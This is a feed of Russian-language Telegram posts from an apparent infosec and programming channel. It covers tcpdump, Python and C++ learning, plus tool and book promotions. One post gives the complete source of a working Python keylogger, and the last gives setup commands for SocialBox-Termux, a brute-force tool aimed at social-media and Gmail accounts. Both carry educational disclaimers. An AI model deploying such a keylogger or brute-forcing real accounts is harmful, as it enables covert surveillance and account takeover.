CodeGuard: CyberSec Edition

💻 Бот для написания постов в Телеграм. Создание и запуск 💪Изучаем детали: Помимо написания постов в канал, должна быть обратная связь для предложений улучшения канала или идей для новый постов. Для обратной связи часто используются специальные сервисы, которые помогают поддерживать связь с подписчиками канала. Но не всегда хочется давать сторонним сервисам права администратора в канале. И сегодня мы попробуем не просто использовать такой сервис, а написать свой, который сможем улучшать под собственные требования и полностью контролировать его работу. В этой статье мы напишем и развернем на удаленном сервере Telegram бота, который обладает обратной связью и помогает выкладывать посты в канал через него. Бот будет выкладывать посты через команду, либо же присылать нам предложения от подписчиков. ✨ Можете глянуть оригинал 😈CodeGuard | #python

💻 Хакер, который взламывает банки и делится опытом Гость подкаста — Антон Бочкарев, специалист по безопасности, профессионально занимающийся тестированием защищённости корпоративных систем на площадке «Третья сторона». Он не просто теоретик: 🗣Проникал в охраняемые территории в роли курьера 🗣 Взламывал крупные банки из ТОПа российского бизнеса 🗣 Делится реальными кейсами, которые работают в 90% случаев 🛡 Также в эфире: - Советы по построению реально защищённой инфраструктуры - Почему компании часто сами создают дыры в безопасности - Как выявлять уязвимости до того, как это сделает злоумышленник Если ты в теме ИБ, pentest или просто интересуешься, как устроены реальные атаки — этот выпуск для тебя. 📱 Полный выпуск на YouTube 😈 CodeGuard | #ethicalhacking #infosec #pentest

🔄 Как перехватить сетевой трафик с помощью tcpdump (пошаговое ПОЛНОЕ руководство) tcpdump — это мощный инструмент для захвата и анализа сетевого трафика в терминале. Он незаменим при отладке сетевых проблем, анализе безопасности или мониторинге активности. 1️⃣ Установка tcpdump Для Debian/Ubuntu:

sudo apt update && sudo apt install tcpdump

Для Kali Linux:

sudo apt install tcpdump

Проверка версии:

tcpdump --version

📺 Базовые команды Посмотреть список доступных интерфейсов:

sudo tcpdump -D

Пример вывода:

1.eth0
2.wlan0
3.any
4.lo [Loopback]

Выберите нужный интерфейс (eth0, wlan0 и т.д.) Захватываем весь трафик:

sudo tcpdump -i eth0

> Нажмите Ctrl+C, чтобы остановить. Ограничиваем количество пакетов:

sudo tcpdump -i eth0 -c 10

(остановится после получения 10 пакетов) Читабельный вывод (меньше деталей):

sudo tcpdump -i eth0 -nn

-n — не преобразует IP в домены -nn — не преобразует ни IP, ни порты 💾 Сохранение трафика в файл Записываем трафик в файл .pcap:

sudo tcpdump -i eth0 -w traffic.pcap

Файл можно потом открыть в Wireshark или обработать программно. Добавляем временную метку к имени файла:

sudo tcpdump -i eth0 -w "traffic_$(date +%Y%m%d_%H%M%S).pcap"

🛡 Фильтрация трафика tcpdump поддерживает фильтры BPF (Berkeley Packet Filter). Вы можете указать условия: по IP, портам, протоколам и комбинации. По IP-адресу:

sudo tcpdump host 192.168.1.1 -i eth0

По порту:

sudo tcpdump port 80 -i eth0

По протоколу:

sudo tcpdump tcp -i eth0

Можно использовать: - tcp - udp - icmp - arp 🔄 Комбинирование условий:

sudo tcpdump "host 192.168.1.1 and port 80" -i eth0

sudo tcpdump "port 80 or port 443" -i eth0

sudo tcpdump "src 192.168.1.1 and dst port 53" -i eth0

📈 Анализ сохранённого трафика Открываем файл:

sudo tcpdump -r traffic.pcap

С фильтром:

sudo tcpdump -r traffic.pcap "port 80"

🖥 Продвинутые примеры Исключаем SSH:

sudo tcpdump "not port 22" -i eth0

🧪 Смотрим только ICMP (пинги):

sudo tcpdump icmp -i eth0

🕵️‍♂️ Ищем DNS-запросы:

sudo tcpdump port 53 -i eth0

📊 С высокой детализацией:

sudo tcpdump -vvv -i eth0

📱 Интеграция с Python Хочешь обрабатывать .pcap файлы в Python? Вот простой пример с библиотекой scapy. 📦 Установка scapy:

pip install scapy

🧠 Пример: считаем количество пакетов

from scapy.all import PcapReader

count = 0
with PcapReader("traffic.pcap") as packets:
    for pkt in packets:
        count += 1
print(f"[+] Всего пакетов: {count}")

🧮 Пример: фильтруем HTTP-запросы

from scapy.all import PcapReader, TCP, IP

http_count = 0
with PcapReader("traffic.pcap") as packets:
    for pkt in packets:
        if pkt.haslayer(TCP) and pkt.haslayer(IP):
            if pkt[TCP].dport == 80 or pkt[TCP].sport == 80:
                http_count += 1
print(f"[+] HTTP-пакетов: {http_count}")

💯 Полезные советы Узнать IP-адрес своего устройства - ip a Слушать все интерфейсы сразу - sudo tcpdump -i any Отфильтровать ARP-трафик - sudo tcpdump arp Посмотреть только заголовки TCP - sudo tcpdump -q tcp ⚠️Важные замечания ❕ Используйте только в тестовой среде ❕ Не запускайте без разрешения владельца сети ❕ Изучайте трафик своих собственных систем ❕ Лучше всего работает в Linux (Kali, Parrot, Ubuntu и др.) Бро, если не не перешлешь это другу, то у админа начнется депрессия.. не рискуй 😈 CodeGuard | #ethicalhacking #практика

🧠 Чистый C++ без лишней боли? После прохождения этого курса вы будете знать достаточно, чтобы разрабатывать на C++ простые программы и решать задачи разной сложности. Вы получите прочный фундамент, который поможет вам в дальнейшем изучении не только C++ 💡 О курсе: Это практический курс по C++, в котором вы: - Научитесь писать простые программы - Освоите переменные, массивы, строки и файлы - Поймёте, как работают условия, циклы и функции - Получите базу алгоритмов и структур данных 🎯 Для кого подходит? - Для полных новичков - Для тех, кто хочет перейти на C++ - Для студентов IT-специальностей - Для самоучек, которые устали от сложных материалов 🚀 Результат: Вы будете: - Уметь решать задачи разной сложности - Понимать, как устроены программы - Готовы двигаться дальше: в game dev, системное программирование, competitive programming и другие ниши 📱 Курс на платформе Stepik бесплатно. 👍 - нам нужны обучающие курсы 🔥 - не интересно, пропущу пост 😈 CodeGuard | #cpp #course #learncoding

📦 Автоматизация документации: MkDocs Material + GitLab CI/CD 🏪 Что открытое ПО даёт: Всем привет! В процессе обновления инфраструктуры сопровождения наших программных решений мы получили интересный опыт, которым хотим поделиться. Эта статья не просто пошаговая инструкция, а практический разбор того, как мы выстроили процесс подготовки технической документации на основе MkDocs Material, автоматизировали его через GitLab CI/CD. Наш опыт окажется полезным тем, кто хочет навести порядок в документации и сделать её частью полноценного dev-процесса. 🙂 Ссылка на статью внутри 😈 CodeGuard | #opensource

🐍 Шпаргалка по Python для хакеров и разработчиков Если вы работаете в сфере кибербезопасности, автоматизации задач или просто изучаете Python — эта шпаргалка станет вашим незаменимым помощником. 📌 Ресурс содержит всё самое важное о языке в удобном виде: синтаксис, типы данных, функции, классы, обработку ошибок и многое другое. 🔗 GitHub: Python Cheat Sheet Что внутри: - Базовые конструкции и переменные - Типы данных: строки, числа, списки, словари, кортежи - Циклы и условия - Функции и модули - ООП (объектно-ориентированное программирование) - Обработка исключений - Работа с файлами - Полезные стандартные библиотеки - Примеры кода для быстрого копирования Почему это удобно? ✔️ Кратко и по делу ✔️ Отлично структурировано ✔️ Подходит как новичкам, так и опытным разработчикам ✔️ Полезно при написании скриптов для пентестов, автоматизации и CTF 😈 CodeGuard

🪙 [Перевод] Кибербезопасность: Тикaющая бомба замедленного действия 🐍Разбор уязвимостей: Об авторе Уилл Кнер — старший менеджер по информационной безопасности и защите данных в компании i-PRO Americas Inc. Если вы работаете в сфере физической безопасности, вы наверняка сталкивались с этим: камера, система контроля доступа или устройство обнаружения вторжений, установленные несколько лет назад и до сих пор функционирующие без единого обновления. Это распространённая ситуация, которую специалисты по безопасности привыкли считать «нормой». Но реальность такова: такое отношение напрямую подвергает организацию серьёзному риску. 📖 Читать дальше 😈 CodeGuard | #cybersecurity

📱 Задачка 😈 CodeGuard | #task #python

💻Нашли для вас самый крутой блог белого хакера На своëм канале он уже осветил такие темы, как: — Мониторинг производительности сети — IP-адресация — Сетевой мониторинг — Модель OSI — Направления в хакинге — Как работает Tor 👀Подписывайся, чтобы не потерять

🆒 Tookie-osint - сбор информации из открытых источников (для разведки, расследований, анализа угроз)

Tookie-osint имеет простой в использовании пользовательский интерфейс и действительно понятен. Основная идея Tookie-osint заключается в обнаружении имен пользователей, запрашиваемых из ввода. Tookie-osint похож на инструмент под названием Sherlock. Он обнаруживает все учетные записи пользователей на разных веб-сайтах, и Tookie-osint успешно справляется с этой задачей почти в 80% случаев. Наш инструмент был создан мной и сообществом и доступен для вашего использования

☠️ Я не несу ответственности за любые вредоносные действия и/или ответственность, вызванную инструментом. :( Обратите внимание, что Tookie-osint был создан, чтобы помочь новым программистам или пентестерам войти в мир OSINT. Цель — сделать Tookie-osint настолько идеальным, насколько я могу, и сделать его простым для понимания новыми программистами. Также обратите внимание, что Tookie-osint оптимизирован для Python. 📱 GutHub 😈 CodeGuard | #cybersecurity #python #linux

🛠 Telegram Bot API 9.1 — чеклисты, подарки и другое 🪄 Как сделать проще?

Telegram продолжает расширять возможности своего мессенджера — в свежем- обновлении Bot API 9.1 разработчикам стали доступны удобные инструменты для работы с чек-листами, подарками и рядом других функций.

Новые классы для чек-листов и задач: 🔹ChecklistTask — класс, описывающий задачу в чек-листе. 🔹Checklist — класс, описывающий сам чек-лист. 🔹 InputChecklistTask — класс для добавления новой задачи в чек-лист. 🔹 InputChecklist — класс для создания чек-листа. 🔹Интеграция чек-листов в сообщения В классах Message и ExternalReplyInfo появился новый поле checklist , которое содержит информацию о прикреплённом чек-листе. 💡Читать полностью на Хабре 😈 CodeGuard | #python

🐧Нашли для вас самый крутой блог Администратора Linux На своëм канале он уже осветил такие темы, как: — Что такое ядро Linux и зачем оно нужно? — Как защитить свой Linux от взлома — Как создать собственный ISO-образ в Linux — Linux и управление пакетами — Процессы в Linux и отладка зависаний 👀Подписывайся, чтобы не потерять

📚 Лаборатория Хакера. Автор: С.А. Бабин Год издательства: 2018

«Понимание безопасности начинается с понимания атак» Если ты хочешь посмотреть на ИБ глазами злоумышленника — эта книга станет твоим личным лабораторным практикумом. Она не просто рассказывает о методах хакерства — она учит думать как хакер. Что внутри? 🗣Перехват паролей и анализ сетевого трафика 🗣Взлом Wi-Fi: от теории до рабочего ключа 🗣Действия после проникновения в локальную сеть 🗣Шифрование, инкогнито в интернете и работа с прокси 🗣Хакинг на смартфоне — потому что безопасность мобильных систем тоже важна 🗣Работа с радужными таблицами и взлом Active Directory 📌Подходит: - Начинающим энтузиастам кибербезопасности - Студентам и старшеклассникам с интересом к IT - Тем, кто хочет почувствовать уязвимости, а не просто прочитать про них Все примеры подробно и понятно — каждый шаг объяснён так, что даже новичок разберётся. 📲Бери книгу → [Code Guard: Archive] 😈 CodeGuard | #book #infosec #hacking #cybersecurity

Создание простого логгера клавиатуры (для обучения) Как работают keylogger'ы? — сегодня разберём, как создать простой логгер нажатий клавиш с помощью Python. 💻 Keylogger - это программа, которая записывает все нажатия на клавиатуре. Иногда используется злоумышленниками, но также может быть полезен для анализа пользовательского поведения или в игровых движках. 🛠 Пример: логгер клавиатуры на Python

from pynput import keyboard  # Библиотека для перехвата событий клавиатуры

# Путь к файлу, в который будут записываться нажатия
LOG_FILE = "key_log.txt"


def on_press(key):
    """
    Функция вызывается каждый раз при нажатии клавиши.
    Принимает объект key, представляющий нажатую клавишу.
    """
    try:
        # Пытаемся получить обычный символ (например, 'a', 'b', '1' и т.д.)
        with open(LOG_FILE, "a", encoding="utf-8") as f:
            f.write(f"{key.char}")
    except AttributeError:
        # Если это не обычный символ (например, пробел, Enter, Shift и т.п.)
        if key == keyboard.Key.space:
            # Записываем пробел
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write(" ")
        elif key == keyboard.Key.enter:
            # Записываем переход на новую строку
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write("\n")
        else:
            # Для всех остальных специальных клавиш — записываем их имя в квадратных скобках
            with open(LOG_FILE, "a", encoding="utf-8") as f:
                f.write(f" [{key}] ")


def start_logger():
    """Запускает логгер и ожидает нажатий клавиш."""
    print("[+] Логгер запущен. Нажмите ESC для выхода.")
    
    # Создаём слушатель клавиатуры
    with keyboard.Listener(on_press=on_press) as listener:
        listener.join()  # Ждём завершения работы (нажатие ESC)


# Точка входа в программу
if __name__ == "__main__":
    start_logger()

✅ Как использовать? 1. Установи библиотеку pynput:

pip install pynput

2. Сохрани код как keylogger.py 3. Запусти:

python keylogger.py

4. Нажимай клавиши — всё будет записываться в файл key_log.txt. 🔍 Что делает этот скрипт? - Слушает нажатия клавиш через pynput - Обрабатывает специальные символы (Enter, Space) - Сохраняет данные в текстовый файл 📌 Важно! - Это локальный логгер, он работает только если вы его запустите - Он не отправляет данные куда-либо - Не используйте без ведома пользователя - Для защиты от таких программ — следите за процессами и сетевым трафиком 🧠 Как обнаружить такой логгер? - Смотрите список запущенных процессов - Проверяйте подозрительные сетевые соединения - Используйте антивирусы и EDR-решения ⚠️ Этот пример только для обучения, не для злонамеренного использования. Используйте только в тестовой среде или на своём ПК. Полный код [Архив] 📌 Вывод Keylogger — это не магия, а всего лишь перехват событий ввода. Понимание того, как они работают, помогает лучше защищаться от реальных угроз. 😈 CodeGuard | #python #ethicalhacking #практика

⚙️ Нашли для вас самый крутой блог senior python-программиста На своëм канале он уже осветил такие темы, как: — Почему твой Python-код медленный? — Walrus-оператор в Python — Почему нужно писать is None, а не == None? — Почему or в Python работает не так, как ты думаешь? — Почему нельзя использовать изменяемые значения по умолчанию? 👀Подписывайся, чтобы не потерять

📱 Задачка Ставь 🔥 если не почувствовал 😈 CodeGuard | #task #python

🧩Типизация в Python: как аннотации спасают ваш код и ускоряют разработку 💻 Сегодня: интересное из мира Python Привет, участникам CodeGuard! Python - язык с динамической типизацией. Хорошо это или плохо? С одной стороны, это скорость разработки: не нужно объявлять и запоминать типы переменных. С другой, это ошибки, которые всплывают при запуске или... через месяц продакшена.В этой статье я покажу, почему type hinting - инструмент, который сэкономит часы отладки и сделает код безопаснее. Аннотации типов впервые были представлены в Python 3.5, который появился в 2015 году. Но до сих пор многие разработчики продолжают писать код в старом стиле. Давайте разберемся, как правильно писать код и что для этого нужно! 🙂 Ссылка на статью внутри 😈 CodeGuard | #python

🚨 SocialBox-Termux: фреймворк для брутфорса в соцсетях ⚠️ Информация представлена исключительно в образовательных целях. Никогда не используйте инструменты взлома без прямого разрешения владельца системы. SocialBox-Termux — это мощный фреймворк для тестирования безопасности аккаунтов методом подбора паролей. Поддерживает: Facebook, Gmail, Instagram, Twitter Создан Белахсаном Оуэрги, доработан и адаптирован samsesh для мобильного использования через Termux. 🛠 Установка:

apt-get update
apt-get install git
git clone https://github.com/samsesh/SocialBox-Termux.git
cd SocialBox-Termux
chmod +x install-sb.sh
./install-sb.sh

▶️ Запуск:

./SocialBox.sh

🔡 Протестировано: - Termux (Android) - Работает с Tor (рекомендуется использовать VPN) Этот инструмент — отличный пример того, как простые атаки могут быть эффективны. Используйте его, чтобы понять уязвимости, а не причинить вред. 🔗 GitHub 😈 CodeGuard | #osint #hacking #tool